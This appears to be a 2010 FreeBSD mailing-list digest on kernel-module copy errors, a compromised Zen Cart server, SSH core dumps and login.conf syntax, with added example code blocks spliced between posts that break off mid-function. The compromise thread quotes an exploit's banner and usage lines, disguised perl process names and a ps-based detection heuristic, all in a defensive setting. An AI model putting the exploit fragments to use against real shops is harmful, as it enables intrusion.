Re: System Crash + Firefox-3.5.7

2010-02-01 Thread Matthew Seaman

On 31/01/2010 20:14, Jerry wrote:
 I have been experiencing one or two system crashes a day for over a
 week now. For no apparent reason, when starting Firefox, the system
 will freeze for approximately 10 seconds or so, then reboot. This does
 not happen every time. It seems to happen maybe every third or fourth
 time, although that is not a proven fact. The /var/crash directory is
 starting to fill up with crash files -- bounds, vmcore.x info.x and I
 have no idea what to do with them. Can I just delete them or is there
 somebody who investigates these spontaneous crashes/reboots. This is
 happening on a FreeBSD-7.2 machine.

Well, unless those files are being used to debug the crashes you're
experiencing, then they're pointless.  If you're not going to send-pr
or bring them to the attention of a developer some other way, you might
as well delete them and recover the disk space.

Even if you have raised a ticket, there's little or no reason to keep a
whole string of crashdumps all showing the same problem.

To report this via the PR system, use send-pr(1) and attach the info.x
file: this should have sufficient information in it for a developer to
start to work on the problem, but they may need you to run a debugger on
the kernel image, so keep hold of all the related files while the PR is
still active.  You should get a response to your PR within a few days,
but a fix might take a bit longer.

Cheers,

Matthew


-- 
Dr Matthew J Seaman MA, D.Phil.   7 Priory Courtyard
  Flat 3
PGP: http://www.infracaninophile.co.uk/pgpkey Ramsgate
  Kent, CT11 9PW
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org


How can I copy the data of buf in kernel space to the uio structure in user space.

2010-02-01 Thread Jun Furukawa

Hi,
For my research, I am now hooking the function vn_write().

This is the part of the source code.

#include <sys/param.h>      /* module */
#include <sys/module.h>     /* module */
#include <sys/kernel.h>     /* module */
#include <sys/types.h>      /* size_t, copystr */
#include <sys/systm.h>      /* copystr */
#include <sys/proc.h>       /* struct thread */
#include <sys/file.h>       /* vnops */
#include <fs/msdosfs/msdosfs_vnops.c>   /* msdosfs_vnodeops */

int
fo_write_hook(struct file *fp,
   struct uio *uio,
   struct ucred *active_cred,
   int flags,
   struct thread *td);

typedef int (*fow_t)(struct file*,
   struct uio*,
   struct ucred*,
   int flags,
   struct thread*);

fow_t old_fo_write;
static char mybuf[256+1];
static size_t len;

/* vn_write hook */
int
vn_write_hook(struct file *fp,
   struct uio *uio,
   struct ucred *active_cred,
   int flags,
   struct thread *td)
{
 ...
   int error;

   memset(mybuf, '\0', 257);

   /* copy (at most 256 bytes of) the caller's data into the kernel buffer */
   error = copyinstr(uio->uio_iov->iov_base, mybuf, 256, &len);

   if (error != 0) {
   uprintf("Cannot write data to kernel space\n");
   }

   /* encrypt the data by Caesar algorithm */
   for (int i = 0; i < len; i++)
   mybuf[i] += 3;

   /* the panic reported below happens on this call */
   error = copystr(mybuf, uio->uio_iov->iov_base, 257, &len);

   if (error != 0) {
   uprintf("Cannot write data to user space\n");
   }

 ...
   return (old_vn_write(fp, uio, active_cred, flags, td));
}

This software is implemented as a kernel module.

After I installed this software and executed the cp command, the
vn_write_hook function is executed.

However, when copystr(mybuf, uio->uio_iov->iov_base, 257, &len) is
executed, the kernel panics.

I referenced /usr/share/examples/kld/cdev/module/cdev.c for writing the
part of the program that copies a buffer in kernel space to a buf in a
user space program. However, as we have seen, this doesn't work
appropriately.

How can I solve this problem?

Please give me your help.

--Jun Furukawa
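
An added example, not part of the original post and not FreeBSD source: copystr(9) copies between two kernel addresses, so the copy back to a user buffer is the job of copyout(9), and write data is arbitrary bytes, so it is moved by iov_len with copyin(9) rather than as a NUL-terminated string with copyinstr(9). The block is a user-space model of that loop that compiles as an ordinary program. Every name ending in _m, user_arena, transform_uio and the demo functions are invented for the model.

```c
/* User-space MODEL of a bounded copyin/transform/copyout loop over a uio.
 * Not kernel code: every *_m name and user_arena is an invented stand-in. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated user address space; pointers outside it are "not user memory". */
static unsigned char user_arena[64];

struct iovec_m { void *iov_base; size_t iov_len; };
enum seg_m { SEG_USER, SEG_SYS };   /* models UIO_USERSPACE / UIO_SYSSPACE */
struct uio_m {
    struct iovec_m *uio_iov;        /* scatter/gather list */
    int             uio_iovcnt;     /* entries in uio_iov */
    size_t          uio_resid;      /* bytes still to transfer */
    enum seg_m      uio_segflg;     /* address space of the iov_base pointers */
};

static int user_range_ok(const void *p, size_t len)
{
    uintptr_t a = (uintptr_t)p, lo = (uintptr_t)user_arena;
    return a >= lo && len <= sizeof(user_arena) &&
           a - lo <= sizeof(user_arena) - len;
}

/* Same argument order as copyin(9): user source, kernel destination. */
static int copyin_m(const void *uaddr, void *kaddr, size_t len)
{
    if (!user_range_ok(uaddr, len))
        return EFAULT;
    memcpy(kaddr, uaddr, len);
    return 0;
}

/* Same argument order as copyout(9): kernel source, user destination. */
static int copyout_m(const void *kaddr, void *uaddr, size_t len)
{
    if (!user_range_ok(uaddr, len))
        return EFAULT;
    memcpy(uaddr, kaddr, len);
    return 0;
}

/* Add `shift` to every pending byte, in place, through a bounce buffer.
 * Lengths come from iov_len and uio_resid, never from a NUL terminator. */
int transform_uio(struct uio_m *uio, int shift)
{
    unsigned char kbuf[4];          /* tiny on purpose: forces chunking */
    size_t left = uio->uio_resid;
    if (uio->uio_segflg != SEG_USER)
        return EINVAL;              /* the model covers user buffers only */
    for (int i = 0; i < uio->uio_iovcnt && left > 0; i++) {
        unsigned char *base = uio->uio_iov[i].iov_base;
        size_t seg = uio->uio_iov[i].iov_len < left ? uio->uio_iov[i].iov_len : left;
        for (size_t off = 0; off < seg; ) {
            size_t n = seg - off < sizeof(kbuf) ? seg - off : sizeof(kbuf);
            int error = copyin_m(base + off, kbuf, n);
            if (error != 0)
                return error;       /* report the fault, do not carry on */
            for (size_t j = 0; j < n; j++)
                kbuf[j] = (unsigned char)(kbuf[j] + shift);
            if ((error = copyout_m(kbuf, base + off, n)) != 0)
                return error;
            off += n;
        }
        left -= seg;
    }
    return 0;
}

/* Constructed input: "abc\0def\n" split over iovecs of 3 and 5 bytes.
 * Returns 0 when all 8 bytes, embedded NUL included, were shifted by 3. */
int demo_two_segments(void)
{
    struct iovec_m iov[2] = { { user_arena, 3 }, { user_arena + 3, 5 } };
    struct uio_m uio = { iov, 2, 8, SEG_USER };
    int error;
    memcpy(user_arena, "abc\0def\n", 8);
    error = transform_uio(&uio, 3);
    return error != 0 ? error : memcmp(user_arena, "def\003ghi\r", 8);
}

/* Constructed input: a base pointer outside the simulated user range. */
int demo_bad_pointer(void)
{
    static unsigned char elsewhere[4] = "xyz";
    struct iovec_m iov = { elsewhere, 3 };
    struct uio_m uio = { &iov, 1, 3, SEG_USER };
    return transform_uio(&uio, 3);  /* EFAULT from the first copyin_m */
}

int main(void)
{
    printf("two segments: %d, bad pointer: %d (EFAULT=%d)\n",
           demo_two_segments(), demo_bad_pointer(), EFAULT);
    return 0;
}
```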






Re: Server compromised Zen-Cart record company Exploit

2010-02-01 Thread Bogdan Webb
try php's safe_mode but it is likely to keep the hackers off, indeed they
can get in and snatch some data but they would be kept out of a shell's
reach... but sometimes safe_mode is not enough... try considering Suhosin
but the addon not the patch... and define the
suhosin.executor.func.blacklist which will deny use of certain php commands
that allow shell execution... but keep in mind it's impossible to prevent
all breaches... this php patch will only keep the hacker kiddos off but
there's still a good chance it can be broken... stay safe !

ref's:
http://www.hardened-php.net/suhosin.127.html
http://beta.pgn.ro/phps/phpinfo.php

2010/1/31 James Smallacombe u...@3.am


 Whoever speculated that my server may have been compromised was on to
 something (see bottom).  The good news is, it does appear to be contained to
 the www unprivileged user (with no shell).  The bad news is, they can
 still cause a lot of trouble.  I found the compromised customer site and
 chmod 0 their cart (had php binaries called core(some number).php that gave
 the hacker a nice browser screen to cause all kinds of trouble)

 Not sure if this is related to the UDP floods, but if not, it's a heck of a
 coincidence.  At times, CPU went through the roof for the www user, mostly
 running some sort of perl scripts (nothing in the suexec-log).  I would kill
 apache, but couldn't restart it as it would show port 80 in use.  I would
 have to manually kill processes like these:

 www  70471  1.4  0.1  6056  3824  ??  R  4:21PM   0:44.75 [eth0] (perl)
 www  70470  1.2  0.1  6060  3828  ??  R  4:21PM   0:44.50 [bash] (perl)
 www  64779  1.0  0.1  6056  3820  ??  R  4:07PM   2:24.34 /sbin/klogd -c 1 -x -x (perl)
 www   70472  1.0  0.1  6060  3828  ??  R 4:21PM   0:44.84

 I could not find ANY file named klogd on the system, let alone in /sbin.
 Clues as to how to dig myself out of this are appreciated

 I found this in /tmp/bx1.txt:

 --More--(5%)#!/usr/bin/php
 ?php

 #
 # --- Zen Cart 1.3.8 Remote Code Execution
 # http://www.zen-cart.com/
 # Zen Cart Ecommerce - putting the dream of server rooting within reach of
 anyone!
 # A new version (1.3.8a)  is avaible on http://www.zen-cart.com/
 #
 # BlackH :)
 #

 error_reporting(E_ALL ^ E_NOTICE);
 if($argc  2)
 {
 echo 
 =___ Zen Cart 1.3.8 Remote Code Execution Exploit  =
 
 |  BlackH bl4c...@gmail.com  |
 
 |  |
 | \$system php $argv[0] url|
 | Notes: url  ex: http://victim.com/site (no slash)  |
 |  |
 
 ;exit(1);

 ---  snipped --

 It is dated from two nights ago, after these issues started, but it's
 nonetheless alarming.  Security Focus is aware of the issue and refers you to
 Zen for the fix.  Only problem is, this is an old version of Zen cart, and
 the

 James Smallacombe PlantageNet, Inc. CEO and Janitor
 u...@3.am http://3.am


Re: VirtualBox doesn't start

2010-02-01 Thread Daniel Bye
On Sun, Jan 31, 2010 at 08:39:49PM +0100, Frank Wißmann wrote:
 Hi, Glen!
 
 Glen Barber wrote:
 
   2.) What version of VirtualBox is this?  virtualbox-ose-3.1.2 and above
   do not require procfs(5); lesser versions do.
 
 When I try to mount /proc via fstab and mount -u -a I get the 
 following error message:
 
 mount: proc : Invalid argument
 
 The line in /etc/fstab is as following:
 
 proc /proc procfs rw 0 0

procfs  /proc   procfs  rw  0   0
^^


 
 Something is wrong here, too, but what?
 
 Greetings Frank
 
 -- 
 GU d- s:+ a+ C+$ UBS$ P L- !E--- W N+@ !o K--? !w--- O !M- !V- PS+ PE 
 Y? !PGP- t+ 5 X !R tv- b++ DI !D G e h+ r- y?
 
 When pack meets pack in the jungle
 and no one will move from the trail
 wait till the leaders have spoken
 it may be fair words shall prevail
 
 (Rudyard Kipling)
 

-- 
Daniel Bye
 _
  ASCII ribbon campaign ( )
 - against HTML, vCards and  X
- proprietary attachments in e-mail / \


Re: Server compromised Zen-Cart record company Exploit

2010-02-01 Thread Fbsd1

Bogdan Webb wrote:

try php's safe_mode but it is likely to keep the hackers off, indeed they
can get in and snatch some data but they would be kept out of a shell's
reach... but sometimes safe_mode is not enough... try considering Suhosin
but the addon not the patch... and define the
suhosin.executor.func.blacklist which will deny use of certain php commands
that allow shell execution... but keep in mind it's impossible to prevent
all breaches... this php patch will only keep the hacker kiddos off but
there's still a good chance it can be broken... stay safe !

ref's:
http://www.hardened-php.net/suhosin.127.html
http://beta.pgn.ro/phps/phpinfo.php

2010/1/31 James Smallacombe u...@3.am


Whoever speculated that my server may have been compromised was on to
something (see bottom).  The good news is, it does appear to be contained to
the www unprivileged user (with no shell).  The bad news is, they can
still cause a lot of trouble.  I found the compromised customer site and
chmod 0 their cart (had php binaries called core(some number).php that gave
the hacker a nice browser screen to cause all kinds of trouble)

Not sure if this is related to the UDP floods, but if not, it's a heck of a
coincidence.  At times, CPU went through the roof for the www user, mostly
running some sort of perl scripts (nothing in the suexec-log).  I would kill
apache, but couldn't restart it as it would show port 80 in use.  I would
have to manually kill processes like these:

www  70471  1.4  0.1  6056  3824  ??  R  4:21PM   0:44.75 [eth0] (perl)
www  70470  1.2  0.1  6060  3828  ??  R  4:21PM   0:44.50 [bash] (perl)
www  64779  1.0  0.1  6056  3820  ??  R  4:07PM   2:24.34 /sbin/klogd -c 1 -x -x (perl)
www   70472  1.0  0.1  6060  3828  ??  R 4:21PM   0:44.84

I could not find ANY file named klogd on the system, let alone in /sbin.
Clues as to how to dig myself out of this are appreciated

I found this in /tmp/bx1.txt:

--More--(5%)#!/usr/bin/php
?php

#
# --- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of
anyone!
# A new version (1.3.8a)  is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

error_reporting(E_ALL ^ E_NOTICE);
if($argc  2)
{
echo 
=___ Zen Cart 1.3.8 Remote Code Execution Exploit  =

|  BlackH bl4c...@gmail.com  |

|  |
| \$system php $argv[0] url|
| Notes: url  ex: http://victim.com/site (no slash)  |
|  |

;exit(1);

---  snipped --

It is dated from two nights ago, after these issues started, but it's
nonetheless alarming.  Security Focus is aware of the issue and refers you to
Zen for the fix.  Only problem is, this is an old version of Zen cart, and
the

James Smallacombe PlantageNet, Inc. CEO and Janitor
u...@3.am http://3.am

check out port mod_security for apache31 and mod_security2 for apache22
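
An added triage example, not written by anyone in this thread, for the process list quoted above: FreeBSD ps(1) appends the accounting name (ucomm) in parentheses when it does not agree with the process's argument vector, and a process is free to overwrite that vector, so `[eth0] (perl)` and `/sbin/klogd -c 1 -x -x (perl)` are perl processes displaying other names. The function names, result codes and the last three sample rows are constructed for the example, and the prefix comparison is a heuristic that tolerates login shells and setproctitle(3) titles.

```c
/* Added triage example: flag `ps aux` rows whose displayed argv[0] disagrees
 * with the accounting name (ucomm) that ps appends in parentheses. */
#include <stdio.h>
#include <string.h>

enum { ROW_UNPARSED = -1, ROW_OK = 0, ROW_MISMATCH = 1 };

/* Rows 0-2 are the ones quoted in the thread (the wrapped klogd row rejoined);
 * row 3 is the thread's truncated row; rows 4-6 are constructed benign rows. */
static const char *const SAMPLE_ROWS[] = {
    "www  70471  1.4  0.1  6056  3824  ??  R  4:21PM   0:44.75 [eth0] (perl)",
    "www  70470  1.2  0.1  6060  3828  ??  R  4:21PM   0:44.50 [bash] (perl)",
    "www  64779  1.0  0.1  6056  3820  ??  R  4:07PM   2:24.34 /sbin/klogd -c 1 -x -x (perl)",
    "www  70472  1.0  0.1  6060  3828  ??  R  4:21PM   0:44.84",
    "root   812  0.0  0.1  5752  2100  ??  Is 9:02AM   0:00.01 sshd: admin@ttyp0 (sshd)",
    "admin  901  0.0  0.1  4500  1800  p0  Ss 9:05AM   0:00.02 -bash (bash)",
    "www    501  0.0  0.2  9000  4000  ??  S  8:00AM   0:01.00 /usr/local/sbin/httpd -DSSL",
};
#define N_ROWS (sizeof(SAMPLE_ROWS) / sizeof(SAMPLE_ROWS[0]))

int ps_row_check(const char *row)
{
    int off = 0;
    /* Skip USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME (assumed to be ten
     * blank-free columns); %n records where COMMAND starts. */
    int rc = sscanf(row, "%*s %*s %*s %*s %*s %*s %*s %*s %*s %*s %n", &off);
    if (rc == EOF || off == 0 || row[off] == '\0')
        return ROW_UNPARSED;              /* no COMMAND column to inspect */

    const char *cmd = row + off;
    size_t len = strcspn(cmd, "\n");
    while (len > 0 && cmd[len - 1] == ' ')
        len--;
    if (len < 4 || cmd[len - 1] != ')')
        return ROW_OK;                    /* no "(ucomm)" suffix was appended */
    size_t open = len - 1;
    while (open > 0 && cmd[open] != '(')
        open--;
    size_t ulen = len - open - 2;         /* characters between '(' and ')' */
    if (open == 0 || ulen == 0)
        return ROW_OK;                    /* nothing to compare against */
    const char *ucomm = cmd + open + 1;

    /* Normalise argv[0]: first word, minus a login-shell '-', a setproctitle
     * ':' and any directory part. */
    const char *a = cmd;
    size_t alen = strcspn(cmd, " ");
    if (alen > open)
        alen = open;
    if (alen > 0 && a[0] == '-') { a++; alen--; }
    if (alen > 0 && a[alen - 1] == ':') alen--;
    for (size_t i = alen; i > 0; i--)
        if (a[i - 1] == '/') { a += i; alen -= i; break; }

    /* Heuristic: accept when one name is a prefix of the other, since ucomm
     * may be truncated or carry a version suffix. */
    size_t n = alen < ulen ? alen : ulen;
    if (n > 0 && strncmp(a, ucomm, n) == 0)
        return ROW_OK;
    return ROW_MISMATCH;
}

int count_mismatches(const char *const rows[], size_t nrows)
{
    int hits = 0;
    for (size_t i = 0; i < nrows; i++)
        if (ps_row_check(rows[i]) == ROW_MISMATCH)
            hits++;
    return hits;
}

int main(void)
{
    for (size_t i = 0; i < N_ROWS; i++)
        printf("%2d  %s\n", ps_row_check(SAMPLE_ROWS[i]), SAMPLE_ROWS[i]);
    printf("mismatched rows: %d\n", count_mismatches(SAMPLE_ROWS, N_ROWS));
    return 0;
}
```

A mismatch is a lead for closer inspection of the process (open files, working directory, parent), not proof of compromise.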


FTP using .netrc

2010-02-01 Thread Fbsd1

Goal is to download the install source directory tree so I can use it as
 a target for local ftp sysinstall.

The problem is that the FreeBSD ftp server keeps timing out before
everything is downloaded. This is the error message ftp gives me.

421 Service not available, remote server timed out. Connection closed

This is the command line command used to launch the ftp session
ftp -v ftp.FreeBSD.org

It defaults to using /root/.netrc which is shown below


machine ftp.FreeBSD.org
login anonymous
password f...@home.com
macdef init
prompt off
cd /pub/FreeBSD/releases/i386/8.0-RELEASE
epsv4 off
mget  ERRATA.HTM ERRATA.TXT HARDWARE.HTM HARDWARE.TXT README.HTM
mget  README.TXT RELNOTES.HTM RELNOTES.TXT cdrom.inf docbook.css
$ getdir base catpages dict doc games info kernels manpages ports
proflibs src
quit

macdef getdir
! mkdir $i
mget $i/*


Question is how can I make FTP resume the download at the place it timed
out. IE not start at the beginning and re-download all the same files
already received. ftp -vR ftp.FreeBSD.org just starts downloading from
the beginning again.

I tried testing using fetch -avrpAF ftp://ftp.FreeBSD.org but the
/.netrc file is not being defaulted to like when using plain ftp as above.



Re: FTP using .netrc

2010-02-01 Thread Matthew Seaman

On 01/02/2010 10:11, Fbsd1 wrote:

 
 machine ftp.FreeBSD.org
 login anonymous
 password f...@home.com
 macdef init
 prompt off
 cd /pub/FreeBSD/releases/i386/8.0-RELEASE
 epsv4 off
 mget  ERRATA.HTM ERRATA.TXT HARDWARE.HTM HARDWARE.TXT README.HTM
 mget  README.TXT RELNOTES.HTM RELNOTES.TXT cdrom.inf docbook.css
 $ getdir base catpages dict doc games info kernels manpages ports
 proflibs src
 quit
 
 macdef getdir
 ! mkdir $i
 mget $i/*
 
 
 Question is how can I make FTP resume the download at the place it timed
 out. IE not start at the beginning and re-download all the same files
 already received. ftp -vR ftp.FreeBSD.org just starts downloading from
 the beginning again.

Change your 'mget' commands into 'mreget'

Or just use wget in mirror-mode...

Cheers,

Matthew

-- 
Dr Matthew J Seaman MA, D.Phil.   7 Priory Courtyard
  Flat 3
PGP: http://www.infracaninophile.co.uk/pgpkey Ramsgate
  Kent, CT11 9PW


Re: ssh/sshd cores dump

2010-02-01 Thread Olivier Nicole
Hi again,

 I have this weird error since yesterday, on a system that used to be
 working nicely, suddenly:
 
 ssh cores dump when run as non privileged user, works fine for root
 sshd aborts on signal 11
 
 I tried to reinstall world, but it is the same.
 
 There is openssl installed from the ports on that machine (what port
 needed it?) as well as ldap/nss_ldap/open_ldap.
 
 It seems that the problem started when I tried to upgrade openldap
 library (openldap-client port).
 
 I did a little bit more digging: ssh cores dump on a strcmp, from
 /lib/libc.so.6; I checked with a working machine, the library are the
 same; I checked ssh, they are the same.
 
 This is very puzzling.
 
 Any clue?
 
 The machine is running 6.4-RELEASE-p9


Some information:

ufo2on65: uname -a
FreeBSD ufo2.cs.ait.ac.th 6.4-RELEASE-p9 FreeBSD 6.4-RELEASE-p9 #0: Fri Jan 29 
16:53:47 ICT 2010 r...@ufo2.cs.ait.ac.th:/usr/obj/usr/src/sys/SMP  amd64

On the server side, for a username that does not exist:

ufo2on66: sudo sshd -ddd -e
sshd re-exec requires execution with an absolute path
ufo2on67: sudo /usr/sbin/sshd -ddd -e
debug2: load_server_config: filename /etc/ssh/sshd_config
debug2: load_server_config: done config len = 157
debug2: parse_server_config: config /etc/ssh/sshd_config len 157
debug3: /etc/ssh/sshd_config:111 setting Subsystem sftp /usr/libexec/sftp-server
debug1: sshd version OpenSSH_4.5p1 FreeBSD-20061110
debug3: Not a RSA1 key file /etc/ssh/ssh_host_dsa_key.
debug1: read PEM private key done: type DSA
debug1: private host key: #0 type 2 DSA
debug1: rexec_argv[0]='/usr/sbin/sshd'
debug1: rexec_argv[1]='-ddd'
debug1: rexec_argv[2]='-e'
debug2: fd 3 setting O_NONBLOCK
debug1: Bind to port 22 on ::.
Server listening on :: port 22.
debug2: fd 4 setting O_NONBLOCK
debug1: Bind to port 22 on 0.0.0.0.
Server listening on 0.0.0.0 port 22.
 Waiting for a connection
 Connection with a username that does not exist
 debug1: fd 5 clearing O_NONBLOCK
debug1: Server will not fork when running in debugging mode.
debug3: send_rexec_state: entering fd = 8 config len 157
debug3: ssh_msg_send: type 0
debug3: send_rexec_state: done
debug1: rexec start in 5 out 5 newsock 5 pipe -1 sock 8
debug3: recv_rexec_state: entering fd = 5
debug3: ssh_msg_recv entering
debug3: recv_rexec_state: done
debug2: parse_server_config: config rexec len 157
debug3: rexec:111 setting Subsystem sftp/usr/libexec/sftp-server
debug1: sshd version OpenSSH_4.5p1 FreeBSD-20061110
debug3: Not a RSA1 key file /etc/ssh/ssh_host_dsa_key.
debug1: read PEM private key done: type DSA
debug1: private host key: #0 type 2 DSA
debug1: inetd sockets after dupping: 3, 3
debug1: res_init()
Connection from 192.41.170.5 port 63398
debug1: Client protocol version 2.0; client software version OpenSSH_4.5p1 FreeB
SD-20061110
debug1: match: OpenSSH_4.5p1 FreeBSD-20061110 pat OpenSSH*
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_4.5p1 FreeBSD-20061110
debug2: fd 3 setting O_NONBLOCK
debug2: Network child is on pid 16235
debug3: preauth child monitor started
debug3: mm_request_receive entering
debug3: privsep user:group 22:22
debug1: permanently_set_uid: 22/22
debug1: list_hostkey_types: ssh-dss
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha256,diffie-hellman-g
roup-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour1
28,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-...@lysator.liu.se,aes128-c
tr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour1
28,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-...@lysator.liu.se,aes128-c
tr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd...@open
ssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd...@open
ssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,z...@openssh.com
debug2: kex_parse_kexinit: none,z...@openssh.com
debug2: kex_parse_kexinit: 
debug2: kex_parse_kexinit: 
debug2: kex_parse_kexinit: first_kex_follows 0 
debug2: kex_parse_kexinit: reserved 0 
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha256,diffie-hellman-g
roup-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-dss,ssh-rsa
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour1
28,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-...@lysator.liu.se,aes128-c
tr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour1
28,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-...@lysator.liu.se,aes128-c
tr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd...@open

A question on syntax in /etc/login.conf

2010-02-01 Thread Leslie Jensen

On the page

http://www.se.freebsd.org/doc/en_US.ISO8859-1/books/handbook/using-localization.html

Syntax is shown as:

language_name:accounts_title:\
:charset=MIME_charset:\
:lang=locale_name:\
:tc=default:


If I look in the file on a newly installed 8.0-RELEASE it shows:

russian|Russian Users Accounts:\
:charset=KOI8-R:\
:lang=ru_RU.KOI8-R:\
:tc=default:


Is it the colon or pipe sign that is correct?

/Leslie
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org


Re: A question on syntax in /etc/login.conf

2010-02-01 Thread Matthew Seaman

On 01/02/2010 11:00, Leslie Jensen wrote:
 On the page
 
 http://www.se.freebsd.org/doc/en_US.ISO8859-1/books/handbook/using-localization.html
 
 
 Syntax is shown as:
 
 language_name:accounts_title:\
 :charset=MIME_charset:\
 :lang=locale_name:\
 :tc=default:
 
 
 If I look in the file on a newly installed 8.0-RELEASE it shows:
 
 russian|Russian Users Accounts:\
 :charset=KOI8-R:\
 :lang=ru_RU.KOI8-R:\
 :tc=default:
 
 
 Is it the colon or pipe sign that is correct?

Probably the latter.  The '|' symbol is used when there are several
alternative names for the same object -- this is not used much in
/etc/login.conf, unlike /etc/termcap.  By convention, the last name in
a list of alternates like this is a comment rather than a tag for
actual use.  See getcap(3) for details.

The first entry is syntactically correct -- 'accounts_title' would be
a boolean value (set to true if present, false if absent) -- but the
login.conf man page knows nothing of 'accounts_title' and it's a funny
name for a boolean. So I guess that's likely to be a typo in the
handbook.

Cheers,

Matthew

-- 
Dr Matthew J Seaman MA, D.Phil.   7 Priory Courtyard
  Flat 3
PGP: http://www.infracaninophile.co.uk/pgpkey Ramsgate
  Kent, CT11 9PW


Re: A question on syntax in /etc/login.conf

2010-02-01 Thread b. f.
...

Is it the colon or pipe sign that is correct?

/Leslie

The answer is clearly set forth in login.conf(5):

 Records in a class capabilities database consist of a number of colon-
 separated fields.  The first entry for each record gives one or more
 names that a record is to be known by, each separated by a '|' character.
 The first name is the most common abbreviation.  The last name given
 should be a long name that is more descriptive of the capability entry,
 and all others are synonyms.  All names but the last should be in lower
 case and contain no blanks; the last name may contain upper case charac-
 ters and blanks for readability.

 Note that since a colon (`:') is used to separate capability entries, a
 `\c' escape sequence must be used to embed a literal colon in the value
 or name of a capability.

When in doubt, look for a manpage (first).

b.
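
The record layout quoted from login.conf(5) above, as an added example that is not part of the thread and not FreeBSD's getcap(3) code: a small parser that splits the first field on '|', classifies the remaining fields as string ('='), numeric ('#') or boolean capabilities as getcap(3) describes, and decodes `\c`. It shows the handbook's `accounts_title` parsing as a boolean capability while the 8.0-RELEASE record yields two names. The tab indentation of the continuation lines and all identifiers are assumptions of the example.

```c
/* Added example: split a login.conf(5)-style capability record into names and
 * capabilities. Not FreeBSD's getcap(3) code; every identifier is local. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum { MAX_NAMES = 4, MAX_CAPS = 8, FIELD_LEN = 64 };
/* type: '=' string, '#' number, 'b' boolean */
struct cap { char name[FIELD_LEN], value[FIELD_LEN], type; };
struct record {
    int nnames; char names[MAX_NAMES][FIELD_LEN];
    int ncaps;  struct cap caps[MAX_CAPS];
};

/* The two records from the thread; the tab indentation is an assumption. */
static const char HANDBOOK[] =
    "language_name:accounts_title:\\\n\t:charset=MIME_charset:\\\n"
    "\t:lang=locale_name:\\\n\t:tc=default:";
static const char RELEASE[] =
    "russian|Russian Users Accounts:\\\n\t:charset=KOI8-R:\\\n"
    "\t:lang=ru_RU.KOI8-R:\\\n\t:tc=default:";

/* Copy src[0..len) to dst: trim blanks, decode the "\c" escape to ':'. */
static void copy_field(char *dst, const char *src, size_t len)
{
    size_t n = 0;
    while (len > 0 && isspace((unsigned char)src[0])) { src++; len--; }
    while (len > 0 && isspace((unsigned char)src[len - 1])) len--;
    for (size_t i = 0; i < len && n < FIELD_LEN - 1; i++) {
        int esc = src[i] == '\\' && i + 1 < len && src[i + 1] == 'c';
        dst[n++] = esc ? ':' : src[i];
        i += (size_t)esc;
    }
    dst[n] = '\0';
}

/* Returns 0 on success, -1 when the record has no first name. */
int parse_record(const char *text, struct record *r)
{
    char buf[512];
    size_t n = 0, len;
    const char *field, *end;
    /* Join continuation lines by dropping each backslash-newline pair. */
    for (const char *p = text; *p != '\0' && n < sizeof(buf) - 1; p++) {
        if (p[0] == '\\' && p[1] == '\n') { p++; continue; }
        buf[n++] = *p;
    }
    buf[n] = '\0';
    memset(r, 0, sizeof(*r));
    /* First field: one or more names separated by '|'. */
    field = buf;
    end = strchr(buf, ':');
    len = end ? (size_t)(end - field) : strlen(field);
    while (r->nnames < MAX_NAMES) {
        const char *bar = memchr(field, '|', len);
        size_t nl = bar ? (size_t)(bar - field) : len;
        copy_field(r->names[r->nnames++], field, nl);
        if (bar == NULL) break;
        field += nl + 1;
        len -= nl + 1;
    }
    /* Remaining fields: name=value, name#number, or a bare boolean name. */
    while (end != NULL && r->ncaps < MAX_CAPS) {
        struct cap *c = &r->caps[r->ncaps];
        field = end + 1;
        end = strchr(field, ':');
        len = end ? (size_t)(end - field) : strlen(field);
        size_t nlen = strcspn(field, "=#:");
        copy_field(c->name, field, nlen);
        if (c->name[0] == '\0') continue;   /* empty field between two colons */
        c->type = nlen < len ? field[nlen] : 'b';
        if (nlen < len)
            copy_field(c->value, field + nlen + 1, len - nlen - 1);
        r->ncaps++;
    }
    return r->names[0][0] != '\0' ? 0 : -1;
}

static struct record parsed;   /* scratch record for the helpers below */

/* Parse `text`; return the named capability or NULL if it is absent. */
const struct cap *lookup_cap(const char *text, const char *name)
{
    if (parse_record(text, &parsed) == 0)
        for (int i = 0; i < parsed.ncaps; i++)
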